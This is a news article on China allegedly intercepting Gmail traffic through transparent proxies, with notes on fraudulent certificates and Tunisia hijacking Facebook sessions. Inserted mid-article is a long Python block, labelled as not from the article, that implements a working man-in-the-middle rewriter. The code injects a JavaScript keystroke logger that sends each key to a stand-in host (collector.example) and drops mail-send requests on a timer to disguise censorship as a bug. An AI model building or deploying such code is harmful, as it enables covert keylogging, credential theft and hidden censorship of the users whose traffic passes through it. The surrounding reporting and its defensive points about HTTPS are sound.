How China and Others Are Altering Web Traffic

Google leveled new charges against China this week, claiming that the country has interfered with some citizens’ access to the Internet giant’s Gmail service, disguising the interference as technical glitches.

Security experts say that China is most likely using invisible intermediary servers, or “transparent proxies,” to intercept and relay network messages while rapidly modifying the contents of those communications. This makes it possible to block e-mail messages while making it appear as if Gmail is malfunctioning.

Companies regularly use transparent proxies to filter employees’ Web access. Some ISPs have also used the technique to replace regular Web advertisements with their own. But it’s becoming increasingly common for governments to use transparent proxies to censor and track dissidents and protestors. All traffic from a certain network is forced through the proxy, allowing communications to be monitored and modified on the fly. Silently intercepting, relaying, and possibly altering traffic between two parties that believe they are talking directly to each other is known as a “man in the middle” attack.

“What you are doing is rewriting the content as it is delivered back to the user,” says Nicholas J. Percoco, the head of SpiderLabs, which is part of the security firm Trustwave. Percoco said China’s ISP could track everyone who uses Gmail. To do this, it would “inject a JavaScript keystroke logger, which would record every keystroke they typed on the service.”
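The rewriting step described above, as an added example that is not from the article or from Trustwave: a stripped-down version of what a transparent proxy does to an HTTP response on its way back to the user. It parses the response, decompresses the body if it was gzip-encoded, inserts a script tag before the closing body tag, and fixes the Content-Length so the browser accepts the altered page. The keystroke-logger payload, its collection hostname (collector.example), the mail path (/mail/send), and the blocking schedule are all made up for illustration; the code assumes Content-Length-framed HTTP/1.x responses and passes anything else through untouched.

```python
"""Illustrative transparent-proxy rewriter (added example, not from the article)."""
import gzip

# Hypothetical payload an intermediary would inject: report each key pressed on
# the page to a collection host (collector.example is a made-up name).
KEYLOGGER_JS = (
    "<script>"
    "document.addEventListener('keydown',function(e){"
    "(new Image).src='http://collector.example/k?c='"
    "+encodeURIComponent(e.key)+'&t='+Date.now();});"
    "</script>"
)

# Constructed sample page standing in for a webmail inbox.
SAMPLE_HTML = b"<html><body><p>Inbox</p></body></html>"


def sample_response(content_type: str, body: bytes, encoding: str = "") -> bytes:
    """Build a raw HTTP/1.1 response the way an upstream server would send it."""
    head = f"HTTP/1.1 200 OK\r\nContent-Type: {content_type}\r\n"
    if encoding:
        head += f"Content-Encoding: {encoding}\r\n"
    head += f"Content-Length: {len(body)}\r\n\r\n"
    return head.encode("latin-1") + body


def parse_response(raw: bytes):
    """Split a raw response into (status line, header dict, body).

    Header names are lower-cased; repeated headers such as Set-Cookie collapse
    to the last value, which is enough for this illustration.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("latin-1").lower()] = value.strip().decode("latin-1")
    return lines[0].decode("latin-1"), headers, body


def build_response(status: str, headers: dict, body: bytes) -> bytes:
    """Serialise (status line, headers, body) back into a raw response."""
    head = status + "\r\n" + "".join(f"{k}: {v}\r\n" for k, v in headers.items())
    return head.encode("latin-1") + b"\r\n" + body


def inject_script(raw: bytes, payload: str = KEYLOGGER_JS) -> bytes:
    """Rewrite an HTML response in flight so the page carries the payload."""
    status, headers, body = parse_response(raw)
    # Only HTML can carry a script tag; chunked responses would need reframing.
    if not headers.get("content-type", "").lower().startswith("text/html"):
        return raw
    if "transfer-encoding" in headers:
        return raw
    encoding = headers.get("content-encoding", "").lower()
    if encoding == "gzip":
        body = gzip.decompress(body)
    elif encoding:
        return raw  # unknown encoding: pass through rather than corrupt the page
    marker = body.lower().rfind(b"</body>")
    body = body + payload.encode() if marker == -1 else body[:marker] + payload.encode() + body[marker:]
    if encoding == "gzip":
        body = gzip.compress(body)
    headers["content-length"] = str(len(body))  # must match or the browser truncates
    headers.pop("etag", None)  # a cached copy would otherwise be revalidated as unchanged
    return build_response(status, headers, body)


def should_disrupt(request_line: str, now_seconds: int, period: int = 600, window: int = 180) -> bool:
    """Drop only the 'send' request, and only for `window` seconds out of every
    `period`, so the failure looks like an intermittent application bug."""
    method, path = request_line.split(" ")[:2]
    if method != "POST" or not path.startswith("/mail/send"):
        return False
    return (now_seconds % period) < window


def relay(request_line: str, upstream_response: bytes, now_seconds: int):
    """Proxy decision for one exchange: None means the response is swallowed."""
    if should_disrupt(request_line, now_seconds):
        return None
    return inject_script(upstream_response)
```

Everything here works only because the proxy can read the bytes it relays. With HTTPS the same proxy sees only TLS records and can neither inject nor selectively rewrite; the most it can do is drop the connection. To rewrite encrypted pages it would have to terminate TLS itself with a certificate the browser accepts for the site's own name, which is exactly why a fraudulently issued certificate is so valuable to an intermediary.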

For unencrypted traffic, defenses against the attack are few: the proxy sits on the only path to the Internet and can read and alter anything it relays. Using a protocol known as HTTPS can prevent a man-in-the-middle attack, because it encrypts information in transit and the browser accepts only a certificate issued for the site’s own name by a certificate authority it trusts, so a proxy cannot impersonate Gmail with a certificate of its own. However, Microsoft revealed in a security advisory issued today that nine fraudulent certificates had been detected for popular Web sites, including Google Mail, Microsoft’s Live service, and Yahoo’s services. A proxy presenting one of those certificates would pass the browser’s checks and could intercept encrypted communications as well.

The Chinese government is thought to have tightened its control over Internet communications in response to political unrest in the Middle East. Google discovered that problems with Gmail from within China came in the form of an attack that caused the Web application to freeze when a user took certain actions, such as clicking the “send” button.

“There is no technical issue on our side—we have checked extensively,” a Google spokesperson said in an e-mail statement. “This is a government blockage carefully designed to look like the problem is with Gmail.”

The attack appears to block the site only sporadically, halting access to the Web application for a few minutes and then allowing the user to again connect to Gmail, Google says.

Other nations have used man-in-the-middle tactics to interfere with Web traffic. Tunisia took a similar approach, grabbing Facebook logins in order to conduct surveillance on its citizens after widespread protests against the rule of Zine El Abidine Ben Ali. Unrest later spread to other countries, including Yemen and Tunisia’s next-door neighbor, Libya. Facebook has become a major communications hub for protestors in many countries. The Tunisian government was “using the transparent proxy to hijack the sessions of the users’ accounts and post positive things about the government to the people’s Facebook accounts,” says Percoco.

Robert Lemos – Technology Review